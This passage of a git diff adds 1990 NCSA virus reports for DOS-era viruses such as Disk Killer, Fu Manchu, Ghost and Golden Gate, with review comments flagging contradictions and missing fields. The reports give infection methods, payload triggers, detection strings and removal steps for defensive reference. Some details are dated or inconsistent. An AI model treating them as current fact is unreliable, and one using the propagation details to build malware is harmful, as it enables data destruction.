diskette's FAT and cause a read (or +write) failure. It cannot infect a hard disk, and will not attempt to do +so. 
If an infected system is rebooted from the hard disk, the virus will +de-activate. This is not the case with rebooting from a clean floppy - +which will become infected. + + Den Zuk demonstrates what can (and will) go wrong with +anti-virus-viruses. The programmer did not anticipate 1.2M or 3.5" +diskettes. When the virus infects a disk of that type, it will destroy +data. Also, several "hacked" versions of this virus have been reported: + +* One variant will disable the SYS command and destroy all data on + drive C: on (Friday) September 13, 1991. + +* Another variant uses a counter which keeps track of how many times + the system has been rebooted. When the limit is reached (usually 5 to + 10 reboots), the drive A: floppy is reformatted. + + You may find the following text strings on infected disks: + +Welcome to the + +C l u b + +<197>The HackerS<197> + +Hackin' + +All The Time + +The HackerS + + If the virus has successfully removed the Brain, the volume label of +infected diskettes may be changed to "Y.C.1.E.R.P.". The Den Zuk virus +will also remove an Ohio virus infection before infecting the diskette +with Den Zuk, presumably because the Ohio is the first draft and a bit +cruder than Den Zuk. + + The Den Zuk virus was probably written by the same person as the Ohio +virus: the "Y.C.1.E.R.P." string is found in the Ohio virus, and the +viral code is similar in many respects. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. 
+ + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa054.txt b/textfiles.com/virus/NCSA/ncsa054.txt new file mode 100644 index 00000000..c2b42d5d --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa054.txt 
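Review bot: the "<197>" tokens in the "Welcome to the Club" string list (and in the Disk Killer message later in this patch) are a rendering placeholder for a non-ASCII byte in the original, so these lines cannot be used verbatim as search strings; either give the byte in hex or mark the token as a placeholder. The damage description is split: Nature of Damage says "The original causes no intentional damage", but the body says the virus overwrites the FAT of any 3.5" diskette it touches and that 1.2M diskettes are destroyed as well, so the header should carry the unintentional-damage case too. The statement that a clean floppy used for the reboot "will become infected" while the virus "cannot infect a hard disk" would read better with its mechanism ("It can survive a warm reboot") placed beside it.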
@@ -0,0 +1,70 @@ + Ŀ + VIRUS REPORT + Devil's Dance + + +Synonyms: Mexican virus + +Date of Origin: December, 1989. + +Place of Origin: Reported by Mau Fragoso of Mexico City. + +Host Machine: PC compatibles. + +Host Files: Remains resident, infects COM files. + +OnScreen Symptoms: After a warm reboot, you will see the message "DID YOU +EVER DANCE WITH THE DEVIL IN THE WEAK MOONLIGHT? PRAY FOR YOUR DISKS!! +The Joker" Also, after your first 2,000 keystrokes, screen colors will +begin to change. + +Increase in Size of Infected Files: 941 bytes. + +Nature of Damage: Corrupts data files, program or overlay files, affects +system run-time operation, corrupts file linkage. + +Detected by: Scanv52+. + +Removed by: CleanUp, Scan/D, or delete infected files. + + This virus will infect a file multiple times until the file becomes +too large to fit in available memory. Once an infected program has been +run, any subsequent warm boot (CTRL-ALT-DEL) will result in the message +noted above. + + The Devil's Dance virus is destructive. + +* After the first 2,000 keystrokes, the virus starts changing the + colors of text displayed on the monitor. + +* After the first 5,000 keystrokes, the virus erases the first copy of + the FAT. At this point, whenever the system is rebooted, it will + display the message above, destroy the first copy of the FAT, then + proceed with the boot process. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. 
+ + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa055.txt b/textfiles.com/virus/NCSA/ncsa055.txt new file mode 100644 index 00000000..fa7b51d6 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa055.txt 
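Review bot: the activation sequence is described two ways in this hunk: the paragraph after the header says any warm boot after an infected program has run shows the message, while the second bullet says the message and the FAT damage occur at reboot only after the first 5,000 keystrokes; state which reboots display the message and whether the message always accompanies the FAT overwrite, because the text tells the reader to treat the message as the symptom. "This virus will infect a file multiple times until the file becomes too large to fit in available memory" also means the 941-byte figure is per infection, not per file, and the header field should say so.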
@@ -0,0 +1,101 @@ + Ŀ + VIRUS REPORT + Disk Killer + + +Synonyms: Ogre, Disk Ogre, Computer Ogre. + +Date of Origin: Spring, 1989. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects both floppy and hard disk boot +sectors. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Corrupts or overwrites boot sector. Affects system +run-time operation. Corrupts program or overlay files. Corrupts data +files. Formats or erases all/part of disk. + +Detected by: Scanv39+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: MDISK, CleanUp, F-Prot, or DOS COPY and SYS commands. + + The Disk Killer is a boot sector virus that infects both hard disks +and floppies. + + The first organization to report this virus was Birchwood systems in +San Jose in early Summer, 1989. Additional reports were received from +Washington, Oklahoma, Minnesota and Arizona. It was finally isolated at +Wedge Systems in Milpitas, California. Disk Killer was isolated on +September 26, 1989. + + The virus spreads by writing copies of itself to three unused +clusters on either a floppy or hard disk, marking them as "bad" in the +FAT to prevent overwriting. The boot sector is modified to execute the +virus code during the boot, permitting it to infect any new disks exposed +to the system. + + The virus counts the number of disks it has infected and does no harm +until it has reached a predetermined limit. When the limit is reached or +exceeded and the system is rebooted, this message is displayed: + +"Disk Killer <197> Version 1.00 by COMPUTER OGRE. Don't turn off the +power or remove the diskettes while Disk Killer is processing! ... +PROCESSING ... Now you can turn off the power. I wish you luck." + + During "processing", it writes clusters of a single character +randomly all over the disk, effectively trashing it. 
+ + Note that when the message is displayed, if the system is turned off +immediately it may be possible to salvage some files on the disk using +various utility programs, as this virus first destroys the boot sector, +FATs, and root directory. + + The internal messages do not appear in sector zero, but are stored in +sector 152 on floppy disks and an as yet undetermined location on hard +disks. This had always added to the confusion over the virus because +message remnants were sometimes discovered in the middle of executable +files, and it was assumed that the virus was a COM or EXE infector. + + If your boot sector does not contain the standard DOS error messages, +then immediately power down and clean out the boot. Infected boot +sectors begin with FAEB. You can check boot sectors with a tool such as +Norton's NU. If the DOS messages are not there (non-system disk; etc.), +then the system is infected. MDISK will remove the virus. + + Disk Killer can be removed by using MDisk, or the DOS SYS command, to +overwrite the boot sector on your hard disk or bootable floppies. On +non-system floppies, files can be copied to non-infected floppies, +followed by reformatting the infected floppies. Be sure to turn the +system off, then reboot the system from a write-protected master +diskette before attempting to remove the virus, or you will be +reinfected by the virus in memory. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. 
+ + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa056.txt b/textfiles.com/virus/NCSA/ncsa056.txt new file mode 100644 index 00000000..9c6d5761 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa056.txt 
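Review bot: the boot-sector check paragraph ("immediately power down and clean out the boot ... MDISK will remove the virus") comes before the cleanup paragraph that gives the precondition (turn the system off, reboot from a write-protected master diskette, or the resident copy reinfects); the precondition belongs with the first mention of removal, not after it. "Infected boot sectors begin with FAEB" is a two-byte indicator, and the text should say it is to be combined with the missing-DOS-messages check rather than used on its own. The quoted message contains a "<197>" placeholder (as in the Den Zuk report in this patch), so it is not a literal search string either.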
@@ -0,0 +1,73 @@ + Ŀ + VIRUS REPORT + Do Nothing Virus + + +Synonyms: Stupid virus + +Date of Origin: October, 1989. + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Resident. Infects COM files. + +Increase in Size of Infected Files: 608 bytes. + +Nature of Damage: Corrupts program files. Does no apparent damage. + +Detected by: Scanv49+, F-Prot, Pro-Scan. + +Removed by: CleanUp, Scan/D, or F-Prot. + + This virus was first reported in October, 1989 by Uval Tal in Israel. +It infects the first COM file in the current directory, and will +re-infect it again and again. It infects no other files, and causes no +other damage. + + It has been called the "stupid" virus because it is so ineffectual +compared to other viruses. For instance: + +* It always installs in memory in the same location, at address + 9800:100H + +* Any program which attempts to use this memory location destroys the + memory-resident copy of the virus. + +* It can only infect systems with 640K of memory. + +* It can not reach across directories. + +* It cannot determine if the file it is infecting has previously been + infected. + +* It does no apparent damage to anything but the first COM file in a + directory. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. 
Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa057.txt b/textfiles.com/virus/NCSA/ncsa057.txt new file mode 100644 index 00000000..8c7c80ab --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa057.txt 
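Review bot: Nature of Damage reads "Corrupts program files. Does no apparent damage.", which contradicts itself; the body supports the first half (the first COM file in the directory is re-infected on every run and the virus cannot recognise its own infection), so the 608-byte figure is per infection and the file grows each time. The "Resident" claim and the "can only infect systems with 640K of memory" bullet both follow from the fixed load address 9800:100H; tying them together in one sentence would make the argument clearer and give a defender the one memory location worth checking.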
@@ -0,0 +1,54 @@ + Ŀ + VIRUS REPORT + EDV + + +Date of Origin: January, 1990. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects boot sector of both floppies and +hard disks, and infects hard disk partition tables. + +Increase in Size of Infected Files: n/a + +Nature of Damage: Corrupts or overwrites boot sector. Affects system +run-time operation. + +Detected by: Scanv58+, IBM Scan. + +Removed by: MDisk/P. + +Scan Code: "MSDOS Vers. E.D.V." appears at the end of the boot sector on +infected floppies. + + The EDV virus was first reported by David Chess at IBM. It is a boot +sector and partition table virus. Troublesome, it causes program crashes +and some data destruction. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa058.txt b/textfiles.com/virus/NCSA/ncsa058.txt new file mode 100644 index 00000000..d36c7291 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa058.txt 
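Review bot: the body says EDV "causes program crashes and some data destruction", but Nature of Damage lists only boot-sector corruption and run-time effects; add the data loss to the header field. The Scan Code line gives its indicator ("MSDOS Vers. E.D.V." at the end of the boot sector) for floppies only, while Host Files says the virus also infects hard disk boot sectors and partition tables; state whether the same string appears there, since that is where a detection check most needs it.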
@@ -0,0 +1,52 @@ + Ŀ + VIRUS REPORT + Eight Tunes Virus + + +Synonyms: 1971 virus + +Date of Origin: January, 1990. + +Place of Origin: Germany. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM and EXE files. + +OnScreen Symptoms: Plays one of eight German folk songs on the speaker. + +Increase in Size of Infected Files: 1,975 bytes increase (about). + +Nature of Damage: Corrupts COM and EXE files. Affects system run-time +operation. Contains no destructive code. + +Detected by: Scanv62+. + +Scan Code: + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa060.txt b/textfiles.com/virus/NCSA/ncsa060.txt new file mode 100644 index 00000000..55320bbf --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa060.txt 
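Review bot: the Synonyms line calls this the "1971 virus" while Increase in Size says "1,975 bytes increase (about)"; the two numbers should agree or the synonym should be explained, since file growth is the only indicator the record offers. The Scan Code field is empty and there is no Removed by line; if no signature or cleaner was known when this was produced, the fields should say so rather than be left blank.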
@@ -0,0 +1,46 @@ + Ŀ + VIRUS REPORT + Friday 13th-B + + +Host Machine: PC compatibles. + +Host Files: COM files. + +Nature of Damage: Corrupts COM files. + +Derived from: Friday 13th. + + This virus is identical to the original except that it infects every +file in the current subdirectory. It will also infect every COM file in +the system path if the infected COM program is in the path. The only way +this virus can spread beyond the current subdirectory is if an infected +program ends up in the system PATH. Then every COM file in the currently +selected subdirectory will get infected. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa061.txt b/textfiles.com/virus/NCSA/ncsa061.txt new file mode 100644 index 00000000..6baa9daf --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa061.txt 
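Review bot: the body paragraph is circular: it first says the variant "infects every file in the current subdirectory", then narrows that to COM files, and the last two sentences restate the PATH case already given in the second sentence; rewrite it as two statements (which files in the current directory are infected, and how an infected program on the PATH widens the spread). The header also omits the size increase, Detected by and Removed by fields that every other report in this patch carries.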
@@ -0,0 +1,44 @@ + Ŀ + VIRUS REPORT + Friday 13th-C + + +Host Machine: PC compatibles. + +OnScreen Symptoms: The message "We hope we haven't inconvenienced you" +appears upon activation. + +Nature of Damage: Corrupts COM files. + +Derived from: Friday 13th-B. + + This is the Friday the 13th-B except a message has been added that +displays - "We hope we haven't inconvenienced you" appears whenever +the virus activates. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa062.txt b/textfiles.com/virus/NCSA/ncsa062.txt new file mode 100644 index 00000000..860557cb --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa062.txt 
@@ -0,0 +1,92 @@ + Ŀ + VIRUS REPORT + Fu Manchu + + +Synonyms: 2080, 2086 + +Date of Origin: March 10, 1988. + +Place of Origin: written by Sax Rohmer. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM, EXE, overlay files. + +OnScreen Symptoms: You may see the message "You will hear from me again!" + +Increase in Size of Infected Files: 2086 bytes for COM files, 2080 bytes +for EXE files. + +Nature of Damage: Affects system run-time operation. Corrupts COM and +EXE files. Some versions corrupt overlay, SYS, and BIN files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, or F-Prot. + +Derived from: Jerusalem. + +Scan Code: encrypted. You may be able to find the marker "sAXrEMHOr" in +infected files. You can also search at offset 1EEH for FC B4 E1 CD 21 80 +FC E1 73 16. + + The virus occurs attached to the beginning of a COM file, or the end +of an EXE file. It is a rewritten ("improved") version of the Jerusalem +virus, and most of what is said for that virus applies here with the +following changes: + +* The code to delete programs, slow down the machine, and display the + black window has been removed, as has the dead area at the end of the + virus and some sections of unused code. + +* The marker is now 'rEMHOr' (six bytes), and the preceeding 'sU' is + now 'sAX' (Sax Rohmer - creator of Fu Manchu). + +* COM files now increase in length by 2086 bytes & EXE files 2080 + bytes. EXE files are now only infected once. + +* One in sixteen times on infection a timer is installed which runs for + a random number of half-hours (maximum 7.5 hours). At the end of this + time the message "The world will hear from me again!" is displayed in + the center of the screen and the machine reboots. This message is + also displayed every time Ctrl-Alt-Del is pressed on an infected + machine, but the virus does not survive the reboot. + +* There is further code which activates on or after the first of August + 1989. 
This monitors the keyboard buffer, and makes derogatory + additions to the names of politicians (Thatcher, Reagan, Botha & + Waldheim), censors out two four-letter words, and to "Fu Manchu" adds + "virus 3/10/88 - latest in the new fun line!" All these additions go + into the keyboard buffer, so their effect is not restricted to the + monitor. All messages are encrypted. + + Some versions of this virus can infect overlay, SYS, and BIN files. +It is still rare in the U.S. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa063.txt b/textfiles.com/virus/NCSA/ncsa063.txt new file mode 100644 index 00000000..814f819c --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa063.txt 
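Review bot: the message quoted under "OnScreen Symptoms" ("You will hear from me again!") does not match the one in the body ("The world will hear from me again!"); the two should agree, or the header should cite the body's wording. "preceeding" in the marker bullet should read "preceding".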
@@ -0,0 +1,61 @@ + Ŀ + VIRUS REPORT + Ghost Virus (boot version) + + +Synonyms: Ghostballs + +Date of Origin: September, 1989. + +Place of Origin: Iceland. + +Host Machine: PC compatibles. + +Host Files: hard disk and floppy disk boot sectors. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Corrupts or overwrites boot sector. + +Detected by: Scanv46+, F-Prot. + +Removed by: CleanUp, MDisk, F-Prot, or use the DOS SYS command. + + This virus was discovered in September, 1989 by Fridrik Skulason at +Icelandic University. The virus infects the boot sectors of hard disks +and floppies. The virus replaces the boot sector of infected systems +with a boot virus similar to Ping Pong. Random file corruption by this +virus has been reported. + + The Ghost Boot virus is usually discovered along with the Ghost COM +virus. If you disinfect the boot sector to get rid of the Boot virus, +unless you also remove the COM virus, your boot sectors will again have +the Ghost Boot virus. It appears that the two viruses assist in the +propagation of each other. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. 
+ + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa064.txt b/textfiles.com/virus/NCSA/ncsa064.txt new file mode 100644 index 00000000..56819dba --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa064.txt 
@@ -0,0 +1,67 @@ + Ŀ + VIRUS REPORT + Ghost Virus (COM version) + + +Synonyms: Ghostballs. + +Date of Origin: September, 1989. + +Place of Origin: Iceland. + +Host Machine: PC compatibles. + +Host Files: COM files. + +Increase in Size of Infected Files: 2351 bytes. + +Nature of Damage: Corrupts or overwrites boot sector; corrupts COM +files. + +Detected by: Scanv46+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: MDisk or DOS SYS command (accompanied by erasing infected +COM files), or use CleanUp or F-Prot. + + The Ghost viruses (both boot and COM) were discovered at Icelandic +University by Fridrik Skulason. The Ghost COM virus infects generic COM +files, increasing the file size by 2,351 bytes. + + Symptoms of this virus are very similar to the Ping Pong virus, and +random file corruption may occur on infected systems. + + The Ghost COM virus may be the first virus to infect both files (COM +files in this case) and boot sectors. After the boot sector is infected, +it also acts as a virus (see Ghost BOOT virus). + + To remove this virus, turn off the computer and reboot from a +write-protected disk. Then use MDisk, NDD, or the DOS SYS command to +replace the boot sector on the infected disk. Any infected .COM files +must also be replaced with clean copies. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. 
Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa065.txt b/textfiles.com/virus/NCSA/ncsa065.txt new file mode 100644 index 00000000..ce49d1d9 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa065.txt 
@@ -0,0 +1,60 @@ + Ŀ + VIRUS REPORT + Golden Gate Virus + + +Synonyms: the 500 Virus, Mazatlan. + +Host Machine: PC compatibles. + +Host Files: boot sector. + +Increase in Size of Infected Files: n/a + +Nature of Damage: Infects boot sector of floppies, may eventually +reformat the hard disk. + +Detected by: ScanV60+. (Identifies it as the Alameda). + +Removed by: MDisk, F-Prot, or the DOS SYS command. + +Derived from: Alameda. + + This is the Alameda or SF Virus that has been modified to format the +C: drive when the counter runs out. The activation occurs after 500 +infections, instead of 100 infections. Note that in all three of these +strains, the counter is zeroed on the host diskette at infection time. +Thus, the activation period on this virus will on the average stretch +into many years. No corruption will occur until 500 new diskettes have +been infected from within a given machine. Since the infection can only +occur when the system is booted with a new diskette, infection is not +frequent with this virus. The majority of infections will probably never +activate. The IBM PC will have long since been supplanted by another +architecture in most environments. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. 
Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa066.txt b/textfiles.com/virus/NCSA/ncsa066.txt new file mode 100644 index 00000000..144821fb --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa066.txt 
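Review bot: "in all three of these strains" has no antecedent in this entry, since the body only names "the Alameda or SF Virus" as a single ancestor and this virus itself; spell out which three strains are meant so the statement about the counter being zeroed at infection time can be checked against the other reports.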
@@ -0,0 +1,45 @@ + Ŀ + VIRUS REPORT + Golden Gate-B + + +Host Machine: PC compatibles. + +Host Files: infects the boot sector of floppy disks. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: May only infect floppies. May do no other damage. + +Derived from: Golden Gate virus. + + This virus is the Golden Gate virus that has had the activation delay +reset to 30 infections. This virus should activate within a couple of +years in most environments. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa067.txt b/textfiles.com/virus/NCSA/ncsa067.txt new file mode 100644 index 00000000..8e57c493 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa067.txt 
@@ -0,0 +1,50 @@ + Ŀ + VIRUS REPORT + Golden Gate-C + + +Synonyms: Mazatlan virus. + +Host Machine: PC compatibles. + +Host Files: boot sector of floppies and hard disk. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: infects both floppies and hard disks. May reformat +hard disks. + +Derived from: Golden Gate-B virus. + + This virus is the Golden Gate virus that is able to infect a hard +disk. It is a nasty virus, since it has more of an opportunity to do +damage than previous versions. Prior versions were limited since systems +with hard disks are only infrequently booted from floppy and booting +from the hard disk overwrote earlier versions. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa068.txt b/textfiles.com/virus/NCSA/ncsa068.txt new file mode 100644 index 00000000..1c458f44 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa068.txt 
